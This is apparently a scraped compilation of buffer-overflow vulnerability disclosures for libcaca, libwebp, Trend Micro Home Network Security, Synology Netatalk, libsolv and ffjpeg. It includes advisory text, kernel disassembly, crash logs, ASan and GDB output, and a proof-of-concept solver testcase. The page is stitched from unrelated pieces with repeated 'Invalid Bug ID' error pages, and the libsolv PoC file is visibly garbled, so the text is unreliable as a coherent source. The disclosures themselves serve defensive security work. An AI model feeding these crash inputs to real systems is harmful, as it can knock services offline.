A flaw was found in libcaca. A heap buffer overflow in export.c in function export_tga might lead to memory corruption and other potential consequences.

'1948675?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2021-30498: Invalid Bug ID

Trend Micro Home Network Security version 6.6.604 and earlier is vulnerable to an iotcl stack-based buffer overflow vulnerability which could allow an attacker to issue a specially crafted iotcl to escalate privileges on affected devices. An attacker must first obtain the ability to execute low-privileged code on the target device in order to exploit this vulnerability.

**Summary**

A privilege escalation vulnerability exists in the tdts.ko chrdev\_ioctl\_handle functionality of Trend Micro, Inc. Home Network Security 6.1.567. A specially crafted ioctl can lead to increased privileges. An attacker can issue an ioctl to trigger this vulnerability.

**Tested Versions**

Trend Micro, Inc. Home Network Security 6.1.567

**Product URLs**

https://www.trendmicro.com/en\_us/forHome/products/homenetworksecurity.html

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

The Home Network Security Station is a device used to monitor and protect home networks from security threats as well as offer simple network management features. The Station provides vulnerability scanning, web threat protection, intrusion prevention, as well as device-based access control for all devices on a home network.

This vulnerability is caused by the lack of input validation on a user’s ioctl request from user land. The upper 16 bits from the ioctl request (AND with 0x3FFF, so 14 bits total) are blindly used as input to __memzero to a stack-based buffer in kernel space. The stack-based buffer is smaller than the maximum ioctl request copy size of 0x3FFF and thus overflows. A user can leverage this to write \\x00 to a large portion of the kernel stack causing a kernel panic and in turn, a denial of service. This could potentially also be leveraged into a privilege escalation vulnerability.

    chrdev_ioctl_handle:
    0000074c  10402de9   push    {r4, lr} {__saved_lr} {__saved_r4}
    00000750  5034e7e7   ubfx    r3, r0, #0x8, #0x8
    00000754  be0053e3   cmp     r3, #0xbe
    00000758  1800e013   mvnne   r0, #0x18  {0xffffffe7}
    0000075c  38d04de2   sub     sp, sp, #0x38
    00000760  2900001a   bne     0x80c
    
    // Check that the bits 8-15 are 0xbe in the IOCTL request
    00000764  ff0010e3   tst     r0, #0xff
    00000768  1500e003   mvneq   r0, #0x15  {0xffffffea}
    0000076c  2600000a   beq     0x80c
    
    00000770  0d20a0e1   mov     r2, sp {var_40}
    00000774  000050e3   cmp     r0, #0
    00000778  7f3dc2e3   bic     r3, r2, #0x1fc0 {var_40}
    // Extract the size of the buffer encoded in the IOCTL request
    0000077c  5028ede7   ubfx    r2, r0, #0x10, #0xe
    00000780  3f30c3e3   bic     r3, r3, #0x3f
    00000784  380000ba   blt     0x86c
    
    // Sanity checks to make sure that the encoded size is not negative
    0000086c  084093e5   ldr     r4, [r3,  #0x8]
    00000870  020091e0   add.s   r0, r1, r2
    00000874  0400d030   sbc.slo r0, r0, r4
    00000878  0040a033   movlo   r4, #0
    0000087c  000054e3   cmp     r4, #0
    00000880  c3ffff0a   beq     0x794
    
    00000794  083093e5   ldr     r3, [r3,  #0x8]
    00000798  020091e0   add.s   r0, r1, r2
    0000079c  0300d030   sbc.slo r0, r0, r3
    000007a0  0030a033   movlo   r3, #0
    000007a4  000053e3   cmp     r3, #0
    000007a8  2a00000a   beq     0x858
    
    // Ensure that r2 is not zero
    000007ac  000052e3   cmp     r2, #0
    000007b0  3400001a   bne     0x888
    
    // Vulnerable __memzero with user provided length and set size stack-buffer
    00000888  0d00a0e1   mov     r0, sp {var_40}
    0000088c  0210a0e1   mov     r1, r2
    00000890  b16901eb   bl      __memzero
    

**Crash Information**

    Unable to handle kernel NULL pointer dereference at virtual address 00000000
    pgd = 8faac000
    [00000000] pgd=6b222831, pte=00000000, ppte=00000000
    Internal error: Oops: 80000017 [#1] SMP ARM
    Modules linked in: kmdiamond(O) tdtsudb(PO) tdts(PO)
    CPU: 0 PID: 1539 Comm: poc2 Tainted: P           O 3.10.70 #2
    task: 8f966000 ti: 8fad2000 task.ti: 8fad2000
    PC is at 0x0
    LR is at 0x0
    pc : [<00000000>]    lr : [<00000000>]    psr: 00000013
    sp : 8fad3f28  ip : 00000000  fp : 7efffc24
    r10: 00000000  r9 : 8fad2000  r8 : 8fae9540
    r7 : 00000003  r6 : 8fae9540  r5 : ffffffff  r4 : 00000000
    r3 : 00000000  r2 : 00000000  r1 : ffffffff  r0 : fffffff2
    Flags: nzcv  IRQs on  FIQs on  Mode SVC32  ISA ARM  Segment user
    Control: 10c53c7d  Table: 6faac06a  DAC: 00000015
    Process poc2 (pid: 1539, stack limit = 0x8fad2238)
    Stack: (0x8fad3f28 to 0x8fad4000)
    3f20:                   00000000 00000000 00000000 00000000 00000000 00000000
    3f40: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    3f60: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    3f80: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    3fa0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    3fc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    3fe0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    Code: bad PC value
    ---[ end trace 7b9adcd427e025e9 ]---
    Dec  2 21:12:17 Diamond user.alert kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000
    Dec  2 21:12:17 Diamond user.alert kernel: pgd = 8faac000
    Dec  2 21:12:17 Diamond user.alert kernel: [00000000] pgd=6b222831, pte=00000000, ppte=00000000
    Dec  2 21:12:17 Diamond user.emerg kernel: Internal error: Oops: 80000017 [#1] SMP ARM
    Dec  2 21:12:17 Diamond user.warn kernel: Modules linked in: kmdiamond(O) tdtsudb(PO) tdts(PO)
    Dec  2 21:12:17 Diamond user.warn kernel: CPU: 0 PID: 1539 Comm: poc2 Tainted: P           O 3.10.70 #2
    Dec  2 21:12:17 Diamond user.warn kernel: task: 8f966000 ti: 8fad2000 task.ti: 8fad2000
    Dec  2 21:12:17 Diamond user.warn kernel: PC is at 0x0
    Dec  2 21:12:17 Diamond user.warn kernel: LR is at 0x0
    Dec  2 21:12:17 Diamond user.warn kernel: pc : [<00000000>]    lr : [<00000000>]    psr: 00000013Unable to handle kernel NULL pointer dereference at virtual address 00000000
    pgd = 8fa68000
    [00000000] pgd=6f924831, pte=00000000, ppte=00000000
    Internal error: Oops: 80000017 [#2] SMP ARM
    Modules linked in: kmdiamond(O) tdtsudb(PO) tdts(PO)
    CPU: 0 PID: 559 Comm: syslogd Tainted: P      D    O 3.10.70 #2
    task: 8f92c3c0 ti: 8fa60000 task.ti: 8fa60000
    PC is at 0x0
    LR is at calltimerfn.isra.35+0x24/0x84
    pc : [<00000000>]    lr : [<8002cabc>]    psr: 60000113
    sp : 8fa61d90  ip : 00000000  fp : 00000004
    r10: 00000001  r9 : 80548894  r8 : 805140c0
    r7 : 00000000  r6 : 00000100  r5 : 8fa60000  r4 : 8fa60010
    r3 : 8fa61d90  r2 : 00000000  r1 : 00000000  r0 : 00000000
    Flags: nZCv  IRQs on  FIQs on  Mode SVC32  ISA ARM  Segment user
    Control: 10c53c7d  Table: 6fa6806a  DAC: 00000015
    Process syslogd (pid: 559, stack limit = 0x8fa60238)
    Stack: (0x8fa61d90 to 0x8fa62000)
    1d80:                                     00000000 00000022 8f8059c0 80548080
    1da0: 8fa61db0 00000000 00200200 8002cc9c 8fa61db0 8fa61db0 ffffbfcc 00000101
    1dc0: 80514084 00000004 8fa60000 00000100 8fa60018 80026d2c 00000001 00015220
    1de0: 00000000 805106c0 80547e40 0000000a ffffbfcd 805140c0 80526524 00400040
    1e00: 00000000 60000193 00000022 00000000 f8200100 8f1d7e00 8f86f410 a0000013
    1e20: 8f87e061 80026ea4 80510cc4 800270e0 80510cc4 8000ee44 f820010c 8051a7f8
    1e40: 8fa61e60 8000857c 803aaf18 60000013 ffffffff 8fa61e94 8f1d7e00 8000db80
    1e60: 8f86f410 60000013 00000070 00006adc 00000000 8f819000 00000000 00000061
    1e80: 8f1d7e00 8f86f410 a0000013 8f87e061 00000000 8fa61ea8 801daac8 803aaf18
    1ea0: 60000013 ffffffff 801daa18 00000062 8f87e000 8f1d7e00 8fa00a70 8fa60010
    1ec0: 8fa00800 803c1ab8 8fae99c0 801c4b2c 00000000 8f87e000 00000000 8f1d7f4c
    1ee0: 8ad51000 00000000 8f92c3c0 800480dc 8f1d7f50 8f1d7f50 00000041 00000062
    1f00: 8f1d7e00 000be334 00000062 8fae99c0 00000000 8fa60000 8fa60000 801c1a04
    1f20: 8f442080 801c4860 8f1d2380 00000062 00000000 8fae99c0 00000062 000be334
    1f40: 8fa61f80 801c1bac 00000062 00000000 7ef0ac14 800bf350 8ad51000 8fae99c8
    1f60: 8f442080 8fae99c0 000be334 00000000 00000000 00000000 00000062 800bf8c4
    1f80: 00000000 00000000 00000000 000bde08 00000062 000be334 00000004 8000e0e8
    1fa0: 8fa60000 8000df40 000bde08 00000062 00000005 000be334 00000062 00000000
    1fc0: 000bde08 00000062 000be334 00000004 00000001 000bde40 00000062 7ef0ac14
    1fe0: 00000000 7ef0ab54 0001d488 76f0100c 60000010 00000005 00000000 00000000
    [<8002cabc>] (calltimerfn.isra.35+0x24/0x84) from [<8002cc9c>] (runtimersoftirq+0x180/0x204)
    [<8002cc9c>] (runtimersoftirq+0x180/0x204) from [<80026d2c>] (dosoftirq+0x108/0x1e0)
    [<80026d2c>] (dosoftirq+0x108/0x1e0) from [<80026ea4>] (dosoftirq+0x50/0x58)
    [<80026ea4>] (dosoftirq+0x50/0x58) from [<800270e0>] (irqexit+0x5c/0x94)
    [<800270e0>] (irqexit+0x5c/0x94) from [<8000ee44>] (handleIRQ+0x44/0x90)
    [<8000ee44>] (handleIRQ+0x44/0x90) from [<8000857c>] (gichandleirq+0x2c/0x5c)
    [<8000857c>] (gichandleirq+0x2c/0x5c) from [<8000db80>] (irqsvc+0x40/0x50)
    Exception stack(0x8fa61e60 to 0x8fa61ea8)
    1e60: 8f86f410 60000013 00000070 00006adc 00000000 8f819000 00000000 00000061
    1e80: 8f1d7e00 8f86f410 a0000013 8f87e061 00000000 8fa61ea8 801daac8 803aaf18
    1ea0: 60000013 ffffffff
    [<8000db80>] (irqsvc+0x40/0x50) from [<803aaf18>] (rawspinunlockirqrestore+0x1c/0x20)
    [<803aaf18>] (rawspinunlockirqrestore+0x1c/0x20) from [<801daac8>] (uartwrite+0xb0/0xd0)
    [<801daac8>] (uartwrite+0xb0/0xd0) from [<801c4b2c>] (nttywrite+0x2cc/0x450)
    [<801c4b2c>] (nttywrite+0x2cc/0x450) from [<801c1a04>] (ttywrite+0x10c/0x2b4)
    [<801c1a04>] (ttywrite+0x10c/0x2b4) from [<800bf350>] (vfswrite+0xb0/0x194)
    [<800bf350>] (vfswrite+0xb0/0x194) from [<800bf8c4>] (SySwrite+0x3c/0x78)
    [<800bf8c4>] (SySwrite+0x3c/0x78) from [<8000df40>] (retfastsyscall+0x0/0x30)
    Code: bad PC value
    ---[ end trace 7b9adcd427e025ea ]---
    Kernel panic - not syncing: Fatal exception in interrupt***
    

**Timeline**

2021-01-22 - Vendor Disclosure  
2021-04-06 - 75+ day follow up  
2021-04-20 - Talos granted timeline extension for disclosure  
2021-05-20 - Vendor Patched  
2021-05-24 - Public Release

Discovered by Carl Hurd and Kelly Leuschner of Cisco Talos.

CVE-2021-32457: TALOS-2021-1230 || Cisco Talos Intelligence Group

A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE24().

'1956922?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2018-25012: Invalid Bug ID

A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in ApplyFilter().

'1956918?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2018-25010: Invalid Bug ID

A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in ShiftBytes().

'1956926?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2018-25013: Invalid Bug ID

A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE16().

'1956917?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2018-25009: Invalid Bug ID

A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in PutLE16().

'1956919?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2018-25011: Invalid Bug ID

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation Manager. Authentication is not required to exploit this vulnerablity. The specific flaw exists within the processing of DSI structures in Netatalk. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12326.

April 29th, 2021

**Synology DiskStation Manager Netatalk dsi\_doff Heap-based Buffer Overflow Remote Code Execution Vulnerability****ZDI-21-492  
ZDI-CAN-12326**

CVE ID

CVE-2021-31439

CVSS SCORE

8.8, (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Synology  

AFFECTED PRODUCTS

DiskStation Manager  

VULNERABILITY DETAILS

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation DS418play. Authentication is not required to exploit this vulnerablity.

The specific flaw exists within the processing of DSI structures in Netatalk. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.  

ADDITIONAL DETAILS

Synology has issued an update to correct this vulnerability. More details can be found at:  
https://www.synology.com/zh-hk/security/advisory/Synology\_SA\_20\_26  

DISCLOSURE TIMELINE

*   2020-11-07 - Vulnerability reported to vendor
*   2021-04-29 - Coordinated public release of advisory
*   2021-05-24 - Advisory Updated

CREDIT

Angelboy(@scwuaptx) from DEVCORE Security Team  

BACK TO ADVISORIES

CVE-2021-31439: ZDI-21-492

Buffer overflow vulnerability in libsolv 2020-12-13 via the Solver * testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **resultp, int *resultflagsp function at src/testcase.c: line 2334, which could cause a denial of service

Permalink

Cannot retrieve contributors at this time

\# test strong recommends

#

\# with normal recommends, the solver will

\# not backtrack to fulfill them.

#

repo system 0 testtags <inline>

#>=Pkg: A 1 1 noarch

#>=Con: C

#>=Pkg: A2 1 1 noarcho alable 0 testtags <inline>

#>=Pkg: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 1 noarcs <inline>

#>=Pkg: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 1 noarch„#>=Pkg: AP 3 1 noarch

#>=Prv: A A = 3.1

#>=Pkg: A 2 2 i686

#>=Req: BBB > 5

#>=Pkg: B 1 1 src

#>=Pkg: A 2 2 badarch

#>=Pkg: C 2 2 badarch

#>=Pkg: D 2 2 badarch

#ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍwithdisabled

disable pkg A-3-1.noarch@available

job install name A \[forcebest\]

result transaction,problems <inline>

#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::h

#>=Pkg: AP 3 1 noarch

#>=Prv: A = 3.1

#>=Pkg: A 2 2 i686

#>=Req: BBB > 5

#>=Pkg: B 1 1 src

#>=Pkg: A 2 2 badarch

#>=Pkg: C 2 2 badarch

#>=Pkg: D 2 2 badarch

#>=Pkg::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::rch

#>=Vnd: foo

#>=Con: A = 3-1

repo available 0 testtags <inline>

#>=Pkg: A 2 1 noarch

#>=Vnd: foo

#>=Pkg: A 3 1 noarch

#>=Vnd: bar

system i686 rpm system

poolflags whatprovideswithdisabled

disable pkg A-3-1.noarch@available

job install name A \[forcebest\]

result transaction,problems <inline>

#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

#>=Con: C2

repo available 0 testtags <inline>

#>=Pkg: A 1 2 noarch

#>=Pkg: B 1 1 noarch

#>=Rec: C

#>=Pkg: C 1 1 noarch

#>=Pkg: B2 1 1 noarch

#>=Rec: C2

#>=Pkg: C2 1 1 noarch

system i686 rpm system

solverflags strongrecommends

job install name B

job install name B2

result transaction,problems <inline>

#>install B-1-1.noarc

CVE-2021-3200: PoC/PoC-testcase_read-2334 at master · yangjiageng/PoC

A stack-based buffer overflow vulnerability exists in ffjpeg through 2020-07-02 in the jfif_decode(void *ctxt, BMP *pb) function at ffjpeg/src/jfif.c:513:28, which could cause a denial of service by submitting a malicious jpeg image.

ffjpeg "jfif\_decode" function stack-buffer-overflow vulerability

Description:  
There is a stack-buffer-overflow bug in jfif\_decode(void \*ctxt, BMP \*pb) function at ffjpeg/src/jfif.c:513:28  
An attacker can exploit this bug to cause a Denial of Service (DoS) by submitting a malicious jpeg image.  
The bug is caused by the dangerous pointer variable using as follow:  
x = ((mcui % mcuc) \* mcuw + h \* 8) \* jfif->comp\_info\[c\].samp\_factor\_h / sfh\_max;  
y = ((mcui / mcuc) \* mcuh + v \* 8) \* jfif->comp\_info\[c\].samp\_factor\_v / sfv\_max;  
idst = yuv\_datbuf\[c\] + y \* yuv\_stride\[c\] + x;  
the variable yuv\_datbuf is an integer pointer array, but there is no security check before the using of yuv\_datbuf (jfif.c: line 513).

**We used AddressSanitizer instrumented in ffjpeg and triggered this bug, the output of asan as follow:**

\==4436==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff9fa0bfd8 at pc 0x0000004f345f bp 0x7fff9f  
READ of size 8 at 0x7fff9fa0bfd8 thread T0  
#0 0x4f345e in jfif\_decode /root/Downloads/fuzz\_code/ffjpeg/src/jfif.c:513:28  
#1 0x4ed951 in main /root/Downloads/fuzz\_code/ffjpeg/src/ffjpeg.c:24:9  
#2 0x7fcbfd63eb96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)  
#3 0x41b929 in \_start (/root/Downloads/fuzz\_code/ffjpeg/src/ffjpeg+0x41b929)

Address 0x7fff9fa0bfd8 is located in stack of thread T0 at offset 280 in frame  
#0 0x4f120f in jfif\_decode /root/Downloads/fuzz\_code/ffjpeg/src/jfif.c:378

This frame has 5 object(s):  
\[32, 160) 'ftab' (line 381)  
\[192, 208) 'dc' (line 382)  
\[224, 236) 'yuv\_stride' (line 387)  
\[256, 280) 'yuv\_datbuf' (line 389) <== Memory access at offset 280 overflows this variable  
\[320, 576) 'du' (line 476)  
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork  
(longjmp and C++ exceptions _are_ supported)  
SUMMARY: AddressSanitizer: stack-buffer-overflow /root/Downloads/fuzz\_code/ffjpeg/src/jfif.c:513:28 in jfif\_decod  
Shadow bytes around the buggy address:  
0x100073f397a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x100073f397b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x100073f397c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x100073f397d0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00  
0x100073f397e0: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2  
\=>0x100073f397f0: 00 00 f2 f2 00 04 f2 f2 00 00 00\[f2\]f2 f2 f2 f2  
0x100073f39800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x100073f39810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x100073f39820: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00  
0x100073f39830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x100073f39840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==4436==ABORTING

We could clearly observe the stack overflow in jfif\_decode function at 0x4f345e, and the variable yuv\_datbuf was overflowing.

Lastly, we used GDB to debug this bug, the GDB outputs:  
Reading symbols from ./ffjpeg...done.  
gdb-peda$ set args -d poc\_stack.fuzz  
gdb-peda$ b \* 0x4f345e  
Breakpoint 1 at 0x4f345e: file jfif.c, line 513.  
gdb-peda$ r  
Starting program: /root/Downloads/fuzz\_code/ffjpeg/src/ffjpeg -d poc\_stack.fuzz  
\[Thread debugging using libthread\_db enabled\]  
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

\[----------------------------------registers-----------------------------------\]  
RAX: 0x0  
RBX: 0x7fffffffe160 --> 0x7ffff6e90510 (<flush\_cleanup>: mov rax,QWORD PTR \[rip+0x360379\] # 0x7ffff71f0890 <run\_fp>)  
RCX: 0xffffffffbff --> 0x0  
RDX: 0x0  
RSI: 0x7474b8 --> 0xfede00 --> 0x1000100 --> 0x0  
RDI: 0x7fffffffdff8 --> 0xb40 ('@\\x0b')  
RBP: 0x7fffffffe3d0 --> 0x7fffffffe4c0 --> 0x50ee40 (<\_\_libc\_csu\_init>: push r15)  
RSP: 0x7fffffffded8 --> 0x4f345f (<jfif\_decode+8799>: call 0x4b6cc0 <\_\_asan::\_\_asan\_report\_load8(\_\_sanitizer::uptr)>)  
RIP: 0xffffffffcd4b6cc0  
R8 : 0xfede00 --> 0x1000100 --> 0x0  
R9 : 0xffffffffc06 --> 0x0  
R10: 0x7fffffffe110 --> 0x3f8000003f800  
R11: 0xffffffffc1a --> 0x0  
R12: 0x1  
R13: 0x1fb  
R14: 0x0  
R15: 0x0  
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)  
\[-------------------------------------code-------------------------------------\]  
Invalid $PC address: 0xffffffffcd4b6cc0  
\[------------------------------------stack-------------------------------------\]  
0000| 0x7fffffffded8 --> 0x4f345f (<jfif\_decode+8799>: call 0x4b6cc0 <\_\_asan::\_\_asan\_report\_load8(\_\_sanitizer::uptr)>)  
0008| 0x7fffffffdee0 --> 0x41b58ab3  
0016| 0x7fffffffdee8 --> 0x522e48 ("5 32 128 8 ftab:381 192 16 6 dc:382 224 12 14 yuv\_stride:387 256 24 14 yuv\_datbuf:389 320 256 6 du:476")  
0024| 0x7fffffffdef0 --> 0x4f1200 (<jfif\_decode>: push rbp)  
0032| 0x7fffffffdef8 --> 0x0  
0040| 0x7fffffffdf00 --> 0x6110000002c0 --> 0x2c600000200 --> 0x0  
0048| 0x7fffffffdf08 --> 0x611000000400 --> 0x42900000300 --> 0x0  
0056| 0x7fffffffdf10 --> 0x0  
\[------------------------------------------------------------------------------\]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0xffffffffcd4b6cc0 in ?? ()

We ensured there is a stack overflow bugs, which will be used to finish a DoS attack.

You can reproduce this stack overflow vulnerability by the follow step:  
ffjpeg -d PoC\_stackoverflow\_ffjpeg

Tag

#buffer_overflow